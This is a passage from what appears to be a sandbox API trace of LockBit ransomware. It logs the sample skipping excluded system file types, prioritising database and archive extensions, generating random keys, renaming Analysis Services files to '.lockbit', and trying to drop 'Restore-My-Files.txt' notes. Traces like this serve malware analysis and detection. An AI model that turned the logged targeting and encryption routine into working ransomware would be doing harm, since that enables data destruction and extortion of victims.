lpString2=".xsl") returned -1 [0099.721] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0099.722] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0099.722] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.lockbit") returned 88 [0099.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0099.777] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0099.777] malloc (_Size=0x40068) returned 0x1ff1e60 [0099.777] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=34076) returned 1 [0099.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0099.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.076] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.079] malloc (_Size=0xc6) returned 0x77d800 [0100.079] NtSetInformationFile (FileHandle=0x3b0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0100.080] free (_Block=0x77d800) [0100.080] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0100.080] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0100.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.080] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0100.080] lstrcmpiW (lpString1=".", lpString2="sql70.xsl") returned -1 [0100.080] lstrcmpiW (lpString1="..", lpString2="sql70.xsl") returned -1 [0100.080] PathFindExtensionW (pszPath="sql70.xsl") returned=".xsl" [0100.080] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0100.080] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0100.081] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0100.082] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="sql70.xsl") returned -1 [0100.083] lstrcmpiW (lpString1="ntldr", lpString2="sql70.xsl") returned -1 [0100.083] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="sql70.xsl") returned -1 [0100.083] lstrcmpiW (lpString1="bootsect.bak", lpString2="sql70.xsl") returned -1 [0100.083] lstrcmpiW (lpString1="autorun.inf", lpString2="sql70.xsl") returned -1 [0100.083] lstrcmpiW (lpString1="thumbs.db", lpString2="sql70.xsl") returned 1 [0100.083] lstrcmpiW (lpString1="iconcache.db", lpString2="sql70.xsl") returned -1 [0100.083] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0100.083] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned=".xsl" [0100.083] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0100.083] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0100.083] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0100.084] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0100.084] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.lockbit") returned 86 [0100.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0100.096] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.096] malloc (_Size=0x40068) returned 0x3d70048 [0100.096] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=32146) returned 1 [0100.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0100.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0100.101] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0100.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.103] malloc (_Size=0xc2) returned 0x77d800 [0100.103] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0100.104] free (_Block=0x77d800) [0100.104] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0100.104] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0100.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.104] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x9a5b, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0100.105] lstrcmpiW (lpString1=".", lpString2="sql90.xsl") returned -1 [0100.105] lstrcmpiW (lpString1="..", lpString2="sql90.xsl") returned -1 [0100.105] PathFindExtensionW (pszPath="sql90.xsl") returned=".xsl" [0100.105] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0100.105] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0100.106] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="sql90.xsl") returned -1 [0100.107] lstrcmpiW (lpString1="ntldr", lpString2="sql90.xsl") returned -1 [0100.107] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="sql90.xsl") returned -1 [0100.107] lstrcmpiW (lpString1="bootsect.bak", lpString2="sql90.xsl") returned -1 [0100.107] lstrcmpiW (lpString1="autorun.inf", lpString2="sql90.xsl") returned -1 [0100.107] lstrcmpiW (lpString1="thumbs.db", lpString2="sql90.xsl") returned 1 [0100.107] lstrcmpiW (lpString1="iconcache.db", lpString2="sql90.xsl") returned -1 [0100.107] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0100.107] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned=".xsl" [0100.107] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0100.107] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0100.107] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0100.108] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0100.108] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.lockbit") returned 86 [0100.108] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0100.108] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.109] malloc (_Size=0x40068) returned 0x3ef0008 [0100.109] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=39515) returned 1 [0100.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0100.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0100.114] ReadFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.123] malloc (_Size=0xc2) returned 0x77d800 [0100.123] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0100.136] free (_Block=0x77d800) [0100.136] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0100.136] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0100.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.136] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0100.136] lstrcmpiW (lpString1=".", lpString2="Sybase.xsl") returned -1 [0100.136] lstrcmpiW (lpString1="..", lpString2="Sybase.xsl") returned -1 [0100.136] PathFindExtensionW (pszPath="Sybase.xsl") returned=".xsl" [0100.136] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0100.136] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0100.137] lstrcmpiW 